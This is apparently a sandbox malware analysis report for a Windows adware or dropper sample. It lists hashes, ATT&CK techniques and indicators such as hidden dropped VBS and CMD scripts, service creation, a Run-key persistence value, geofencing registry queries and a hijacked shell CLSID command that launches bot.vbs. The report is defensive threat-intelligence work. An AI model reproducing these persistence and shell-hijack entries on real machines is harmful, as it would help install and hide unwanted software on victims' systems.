966b99614aab1c2aca8dd0aaaa0d137ad4a3a0fe8f5c3310606bfb483175b101

Analysis

max time kernel
104s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 12:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
Size

347KB
MD5

c29087510295d91f0f0e08cb812324c9
SHA1

387184643a119827ca49c36f1d3bf3bb754e3511
SHA256

966b99614aab1c2aca8dd0aaaa0d137ad4a3a0fe8f5c3310606bfb483175b101
SHA512

4f9412586cefa740c132c96aecf5a774e4b6464087bb930346c64b5d6284f34b7c18af9fafb14e9561e3848fb25f94add8cdddcae92ca43250a67cdd206a3fa3
SSDEEP

6144:tTfFDbRnOTrt5Jbd2RrIH4ZWpGeEAMQaEABWfeqhI7/NeOvHDqi4uyaXt6kAw0h9:D5OD45o6nQVMWfze71H7p4u/XZAw0oq

Score

8^/10

defense_evasion discovery evasion execution motw persistence phishing

Malware Config

Signatures

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1888	attrib.exe
5072	attrib.exe
2244	attrib.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	msn.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 4 IoCs

pid	Process
1852	setup.exe
3640	msn.exe
3268	msndown.exe
1688	cpa.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UUSEE = "C:\\Program Files (x86)\\Common Files\\uusee\\UUSeeMediaCenter.exe"	cpa.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
12	http://www.js96110.com.cn/

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Kingsoft\myfile\fav\fav.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\360.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\starts.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tools.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\runonce.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\setup.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\open.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\soft\setup.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\tao.ico	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\安全工具.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\cpa.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\tool.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\se.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\tao2.ico	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\网址导航.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\361.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\open.vbs	attrib.exe
File created	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\cpa.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\runonce.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\soft\cpa.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\se1.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\软件下载.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\tools.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\soft\msn.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\msn.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	attrib.exe
File created	C:\Program Files\Windows NT\se1.vbs	cmd.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tool.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\软件下载.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\se.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\open.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\360.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Windows NT\se.vbs	cmd.exe
File opened for modification	C:\Program Files\Kingsoft\myfile	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\se1.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\starts.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\安全工具.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\cpa.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\361.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\__tmp_rar_sfx_access_check_240616734	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\网址导航.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Windows NT\se.vbs	cmd.exe
File opened for modification	C:\Program Files\Windows NT\se1.vbs	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\tao.ico	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\tao2.ico	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5048	sc.exe
3496	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msndown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cpa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe

System Service Discovery 1 TTPs 3 IoCs

Adversaries may try to gather information about registered local system services.

discovery

System Service Discovery

T1007

pid	Process
3496	sc.exe
872	net.exe
912	net1.exe

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e39000000000200000000001066000000010000200000003f054432c70ee0ed36432dbd1c91d0ab3158af2e7589ae20dc671581609e4e5a000000000e8000000002000020000000830163dd70f50477581ea23fcb819254f5ae784b0e7abbbbf52d79be460e0665200000003831b0d3ee7e9bdafe9595a6f5099c523eccbfc86028c76d328eb29a159b4baf400000007a6d6b76e97fa1d2d6e64709c75c3181e7b55751ec5a525a1665fe0b53bb410de364197e01f5a4aa7925d59f25c0d7760b57825254d0d92999d6b3a0e4770580	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31147593"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31147593"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 007fd5d44946db01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "440081024"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31147593"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3533730159"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31147593"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{FE2AFB17-B23C-11EF-ADF2-EE81E66BE9E9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3534355088"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3533730159"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f039dad44946db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e3900000000020000000000106600000001000020000000a6e03000a356da7488b5ef8ac6f2e8edf13c0cb8b7f3f59e357caaa9c4880921000000000e8000000002000020000000be903a39f9cebb7c8443b06080f7412c1f2be9462689580b6fd9d54f6be11e05200000002fa920e5eacbb2bd7b44309d9028ea14c266cfe6c2a716d4f6bc5d2e24bb5fb640000000c9573519aff78218b97a7fb003910adf58f52ff7a3160d3857e27f17d4e57c74c5122d81e169190a2fc6470944e68646c533523fc13759b645710e1e68e72529	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3534355088"	IEXPLORE.EXE

Modifies registry class 45 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\WantsParsDisplayName	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideOnDesktopPerUser	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
